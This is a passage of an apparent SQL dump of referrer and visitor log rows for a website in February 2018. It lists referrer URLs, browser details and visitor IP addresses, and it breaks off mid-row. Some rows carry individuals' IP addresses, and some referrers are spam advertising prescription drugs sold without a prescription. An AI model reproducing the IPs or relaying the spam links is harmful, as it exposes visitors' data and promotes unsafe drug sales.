'000',1,0),(19741,'2018-02-06','https://zphiblgz.org','Firefox','Windows','40.1','','186.216.102.61','000',2,0),(19742,'2018-02-06','https://owa.howardcc.edu/owa/','Safari','Macintosh','11.0.1','','73.173.166.249','000',4,0),(19743,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.12','000',2,0),(19744,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.112','000',2,0),(19745,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.214','000',1,0),(19746,'2018-02-06','https://onlywood.ru/catalog/lumber.html','MSIE','Windows','5.5','','37.115.184.155','000',1,0),(19747,'2018-02-06','http://pospektr.ru/','MSIE','Windows','6.0','','178.137.82.153','000',3,0),(19748,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.251','000',1,0),(19749,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',2,0),(19750,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.181','000',1,0),(19751,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.167','000',1,0),(19752,'2018-02-06','http://www.zphiblgz.org','Unknown','Unknown','Unknown','','138.197.7.130','000',19,0),(19753,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',2,0),(19754,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(19755,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.116','000',1,0),(19756,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',1,0),(19757,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.103','000',1,0),(19758,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.80','000',2,0),(19759,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.119','000',1,0),(19760,'2018-02-06','https://zphiblgz.org/','Firefox','Windows','52.0','','77.120.125.23','000',2,0),(19761,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.116','000',1,0),(19762,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.197','000',1,0),(19763,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.17','000',2,0),(19764,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.248','000',1,0),(19765,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.27','000',1,0),(19766,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.28','000',2,0),(19767,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.117','000',1,0),(19768,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.109','000',1,0),(19769,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.186','000',1,0),(19770,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.200','000',1,0),(19771,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.40','000',1,0),(19772,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',2,0),(19773,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',2,0),(19774,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.82','000',2,0),(19775,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.180','000',2,0),(19776,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.112','000',1,0),(19777,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.3','000',2,0),(19778,'2018-02-06','https://zphiblgz.org','MSIE','Windows','9.0','','204.79.180.16','000',1,0),(19779,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','108.31.219.65','000',2,0),(19780,'2018-02-06','https://zphiblgz.org','Safari','iPhone','11.0','','173.67.42.188','000',12,0),(19781,'2018-02-06','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.31','000',1,0),(19782,'2018-02-06','http://zphiblgz.org/members/wp-includes/SimplePie/Cache/DB.php','Safari','iPad','10.0','','45.40.156.15','000',1,0),(19783,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.194','000',1,0),(19784,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.229','000',1,0),(19785,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.201','000',1,0),(19786,'2018-02-06','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.97.118','000',1,0),(19787,'2018-02-07','https://pills24h.com/buy-dapoxetine-online-without-prescription/','MSIE','Windows','5.5','','46.118.225.78','000',3,0),(19788,'2018-02-07','https://zphiblgz.org','Chrome','Linux','34.0.1847.137','','66.240.192.138','000',1,0),(19789,'2018-02-07','https://zphiblgz.org','Firefox','Linux','3.6.13','','208.80.194.31','000',2,0),(19790,'2018-02-07','https://zphiblgz.org','MSIE','Windows','9.0','','208.80.194.31','000',1,0),(19791,'2018-02-07','http://www.kmv.prom23.ru/','Opera','Windows','9.0','','46.119.113.175','000',1,0),(19792,'2018-02-07','https://zphiblgz.org','Chrome','Macintosh','63.0.3239.108','','192.198.80.227','000',2,0),(19793,'2018-02-07','https://zphiblgz.org','Firefox','Windows','3.6.23','','208.80.194.35','000',1,0),(19794,'2018-02-07','https://zphiblgz.org','MSIE','Windows','8.0','','150.70.188.165','000',1,0),(19795,'2018-02-07','https://zphiblgz.org','MSIE','Windows','6.0','','208.80.194.31','000',1,0),(19796,'2018-02-07','https://zphiblgz.org','Firefox','Windows','32.0','','87.236.20.167','000',1,0),(19797,'2018-02-07','https://zphiblgz.org','Firefox','Macintosh','5.0.1','','208.80.194.30','000',1,0),(19798,'2018-02-07','https://zphiblgz.org','Firefox','Windows','32.0','','31.147.204.106','000',1,0),(19799,'2018-02-07','http://zphiblgz.org/','Chrome','Windows','55.0.2883.87','','146.185.223.111','000',3,0),(19800,'2018-02-07','https://zphiblgz.org','Firefox','Windows','40.1','','49.248.43.26','000',2,0),(19801,'2018-02-07','https://pills24h.com/buy-zoloft-online-without-prescription/','MSIE','Windows','6.0','','37.115.184.155','000',6,0),(19802,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.203','000',1,0),(19803,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.208','000',1,0),(19804,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.170','000',1,0),(19805,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.117','000',1,0),(19806,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.118','000',3,0),(19807,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.239','000',1,0),(19808,'2018-02-07','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1690.RdG60XG-1YtPtdmwU7M4UsvMPmxRQoeeEzx1jaro50c.d4755e3a32a0d2ca0d726f010ffca618693d33ed&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU040enI0dEM5cXJDSk9UcGVFVTM2cTN4azVibFBBWmxLMk50WFd2OExVZHR2Zyws&sign=5d11ca02ac975eb32580e0f69c3e04be&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','159.89.10.68','000',2,0),(19809,'2018-02-07','https://bonkers.name/','MSIE','Windows','6.0','','178.137.82.153','000',3,0),(19810,'2018-02-07','https://bonkers.name/','MSIE','Unknown','7.0b','','178.137.82.153','000',3,0),(19811,'2018-02-07','https://owa.howardcc.edu/owa/redir.aspx?REF=OXZB4Svh6t6Cpqaid2z3UPl4109iM3RfFTlnJMZSOwQfB93rKG7VCAFodHRwczovL3pwaGlibGd6Lm9yZy9zY2hvbGFyc2hpcC8.','Chrome','Android','64.0.3282.137','','68.33.71.184','000',2,0),(19812,'2018-02-07','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1690.vE5bBQM2NhkKvd5XARKe9V4vz0rSFQ9nsG1e8qD_ywA.f6ffa3571eb87b93840e5d27ffd599d49b662b0e&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU041UVZEWnlfZ1pSckVZcFVna3lSWk1lQWVQUzdFZTc2WEVuMEVlOGRkVjlodyws&sign=35215fb8653ed0671c7c1e62917df41f&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','162.243.6.14','000',2,0),(19813,'2018-02-07','https://zphiblgz.org','Firefox','Linux','24.0','','73.200.189.209','000',2,0),(19814,'2018-02-07','https://zphiblgz.org','Firefox','Windows','40.1','','60.52.28.151','000',2,0),(19815,'2018-02-07','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1690.950xrX_lP4qDiUOnmX1OrA6vePRViSbsqV-qJFxqQkA.c4089e8ef01fcf52cc38ce71cc044795fe40f05b&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042aF9VOUtSUWdBQzFKNmxBbHU2TmZ2RnVTV2pOU004T0tINWp0Qy0zUFlpdyws&sign=fb39a1c6496a48310ea8c87119f0c920&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','35.183.34.133','000',2,0),(19816,'2018-02-07','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1690.q6NiZxTTw6ozxm8UYJvEVcRADwdswFUngeBXhme-Crw.eeb5c49df5082d638a7423aefe0a16f57bc7dcf8&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU043THhhU1UtTWNZSWxabE16SGhZMnFjQ0xYNFBDMVhFQm5Ic09nQVBfWXFrdyws&sign=37036dcdc7930de5cd600f722a2bc4c8&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','128.199.99.10','000',2,0),(19817,'2018-02-07','http://yandex.com/clck/jsredir?from=yandex.com%3Bimages%2Fsearch%3Bimages%3B%3B&text=&etext=1690.eExTDhIpZV8M2RLm_RA2x_wlozauWJ7u7F57WUhSAWY.7991ae94eddb3b2984c96a60ac6ea93aa11fd5a1&uuid=&state=tid_Wvm4RM35w_KF6_gYfMtmgS4f5d81OW-g6ZRMBJsI3GF_Hm08bQ,,&data=UlNrNmk5WktYejY4cHFySjRXSWhXTUVrb3luSzVNUV8zb3lxZnprbjRIV1V2SWZUeXRjU29kc1FmMVhEZUFDZ29aZVoybXlPU042SDlpY3VfaTRwX1ZJRUVEV3ktYkVwZmk5OGUtM1YxZFFRWkp5YlBwOHhCZyws&sign=c0500c159d482cd839973a3cc7c37ddf&keyno=0&b64e=2&l10n=en','Firefox','Linux','52.0','','188.166.118.74','000',2,0),(19818,'2018-02-07','https://zphiblgz.org','Chrome','Macintosh','61.0.3163.100','','54.183.130.127','000',2,0),(19819,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.238','000',2,0),(19820,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.117','000',2,0),(19821,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.75','000',1,0),(19822,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.85','000',1,0),(19823,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.5','000',2,0),(19824,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.58','000',1,0),(19825,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.212','000',1,0),(19826,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.224','000',3,0),(19827,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.214','000',2,0),(19828,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.192','000',1,0),(19829,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.145','000',2,0),(19830,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.199','000',3,0),(19831,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.117','000',3,0),(19832,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.246','000',1,0),(19833,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.210','000',2,0),(19834,'2018-02-07','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','91.206.201.148','000',2,0),(19835,'2018-02-07','https://zphiblgz.org','Chrome','Windows','63.0.3239.132','','71.121.167.97','000',11,0),(19836,'2018-02-07','https://owa.howardcc.edu/owa/','Puffin','Android','6.1.4.16005','','45.33.131.17','000',4,0),(19837,'2018-02-07','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','50.87.249.154','000',2,0),(19838,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.219','000',2,0),(19839,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.115','000',1,0),(19840,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.66','000',1,0),(19841,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.212','000',2,0),(19842,'2018-02-07','https://zphiblgz.org','Chrome','Android','64.0.3282.137','','206.207.159.2','000',3,0),(19843,'2018-02-07','http://zphiblgz.org/','Firefox','Windows','33.1','','178.137.17.67','000',2,0),(19844,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.134','000',2,0),(19845,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.178','000',1,0),(19846,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.141','000',2,0),(19847,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.105.113','000',2,0),(19848,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.212','000',2,0),(19849,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.84','000',3,0),(19850,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.182','000',4,0),(19851,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.29','000',2,0),(19852,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.119','000',1,0),(19853,'2018-02-07','https://zphiblgz.org/scholarship/','Firefox','Windows','57.0','','198.51.197.42','000',1,0),(19854,'2018-02-07','https://zphiblgz.org','Safari','iPhone','11.0','','174.204.39.190','000',4,0),(19855,'2018-02-07','https://mamasuper.prom.ua/','MSIE','Windows','6.0','','46.119.113.175','000',3,0),(19856,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.138','000',2,0),(19857,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.211','000',1,0),(19858,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.247','000',1,0),(19859,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.172','000',1,0),(19860,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.7','000',1,0),(19861,'2018-02-07','https://zphiblgz.org','Safari','Macintosh','11.0.3','','68.180.94.99','000',1,0),(19862,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.21','000',1,0),(19863,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.84.198','000',1,0),(19864,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.82','000',1,0),(19865,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.24','000',1,0),(19866,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.48','000',1,0),(19867,'2018-02-07','http://polyana-skazok.org.ua/','MSIE','Windows','6.0','','46.211.13.134','000',3,0),(19868,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.82','000',1,0),(19869,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.210','000',1,0),(19870,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.171','000',5,0),(19871,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.213','000',1,0),(19872,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.204','000',1,0),(19873,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.64','000',1,0),(19874,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.72','000',1,0),(19875,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.118','000',2,0),(19876,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.203','000',2,0),(19877,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.97','000',1,0),(19878,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.203','000',1,0),(19879,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.215','000',2,0),(19880,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.147','000',1,0),(19881,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.184','000',1,0),(19882,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.77','000',2,0),(19883,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.23','000',1,0),(19884,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.215','000',1,0),(19885,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.210','000',4,0),(19886,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.218','000',1,0),(19887,'2018-02-07','https://www.google.com/','Chrome','Windows','64.0.3282.140','','68.190.16.108','000',1,0),(19888,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.193','000',1,0),(19889,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.57','000',1,0),(19890,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.216','000',1,0),(19891,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.99.187','000',2,0),(19892,'2018-02-07','http://www.google.com/url?url=www.zphiblgz.org&yahoo.com','MSIE','Windows','9.0','','184.154.36.183','000',5,0),(19893,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.178','000',1,0),(19894,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.184','000',2,0),(19895,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.137','000',1,0),(19896,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.183','000',3,0),(19897,'2018-02-07','https://zphiblgz.org','Firefox','Windows','40.1','','109.186.48.121','000',2,0),(19898,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.5','000',1,0),(19899,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.140','000',1,0),(19900,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.182','000',6,0),(19901,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.99','000',1,0),(19902,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.167','000',2,0),(19903,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.41','000',1,0),(19904,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.75','000',1,0),(19905,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.33','000',1,0),(19906,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.17','000',1,0),(19907,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.114','000',2,0),(19908,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.118','000',1,0),(19909,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.215','000',1,0),(19910,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.114.113','000',1,0),(19911,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.20','000',1,0),(19912,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.75','000',1,0),(19913,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.215','000',1,0),(19914,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.22','000',2,0),(19915,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.49','000',1,0),(19916,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.240.81','000',1,0),(19917,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.139','000',1,0),(19918,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.8','000',1,0),(19919,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.252','000',1,0),(19920,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.6','000',1,0),(19921,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.181','000',1,0),(19922,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.85.207','000',2,0),(19923,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.86.90','000',2,0),(19924,'2018-02-07','https://zphiblgz.org/scholarship/','Safari','iPad','11.0','','71.121.163.58','000',1,0),(19925,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.85','000',2,0),(19926,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.226','000',3,0),(19927,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.124','000',1,0),(19928,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.227','000',1,0),(19929,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.60','000',1,0),(19930,'2018-02-07','https://zphiblgz.org','SamsungBrowser','Android','6.2','','166.137.240.113','000',1,0),(19931,'2018-02-07','https://zphiblgz.org','SamsungBrowser','Android','6.2','','107.77.202.50','000',3,0),(19932,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.217','000',1,0),(19933,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.112','000',1,0),(19934,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.111','000',3,0),(19935,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.8','000',1,0),(19936,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.55','000',2,0),(19937,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.112','000',1,0),(19938,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.167','000',1,0),(19939,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.149','000',2,0),(19940,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.46','000',1,0),(19941,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.151.93','000',2,0),(19942,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.66','000',2,0),(19943,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.26','000',1,0),(19944,'2018-02-07','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','89.46.105.159','000',2,0),(19945,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.33','000',1,0),(19946,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.152.174','000',1,0),(19947,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.133','000',4,0),(19948,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.201','000',1,0),(19949,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.23','000',1,0),(19950,'2018-02-07','https://zphiblgz.org','Chrome','Windows','54.0.2840.71','','136.243.172.24','000',2,0),(19951,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.229','000',4,0),(19952,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.18','000',1,0),(19953,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.81','000',2,0),(19954,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.104','000',2,0),(19955,'2018-02-07','https://nakozhe.com/','MSIE','Windows','6.0','','188.163.79.63','000',6,0),(19956,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.38','000',1,0),(19957,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.193','000',1,0),(19958,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.195','000',1,0),(19959,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.114','000',4,0),(19960,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.205','000',1,0),(19961,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.116','000',1,0),(19962,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.24','000',1,0),(19963,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.124.120','000',1,0),(19964,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.157.231','000',2,0),(19965,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.209','000',1,0),(19966,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.108.117','000',1,0),(19967,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.166','000',2,0),(19968,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.146.181','000',2,0),(19969,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.171.225.21','000',1,0),(19970,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.115.41','000',1,0),(19971,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.148.131','000',1,0),(19972,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','69.63.188.207','000',3,0),(19973,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.123.137','000',1,0),(19974,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.60','000',1,0),(19975,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.156.55','000',1,0),(19976,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.155.75','000',1,0),(19977,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.121.116','000',3,0),(19978,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.196','000',2,0),(19979,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.100.194','000',1,0),(19980,'2018-02-07','http://uptime-as.net/zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.140','000',1,0),(19981,'2018-02-07','http://zphiblgz.org','Unknown','Unknown','Unknown','','74.115.214.133','000',1,0),(19982,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','173.252.98.210','000',2,0),(19983,'2018-02-07','https://zphiblgz.org','Unknown','Unknown','Unknown','','66.220.159.113','000',1,0),(19984,'2018-02-07','https://zp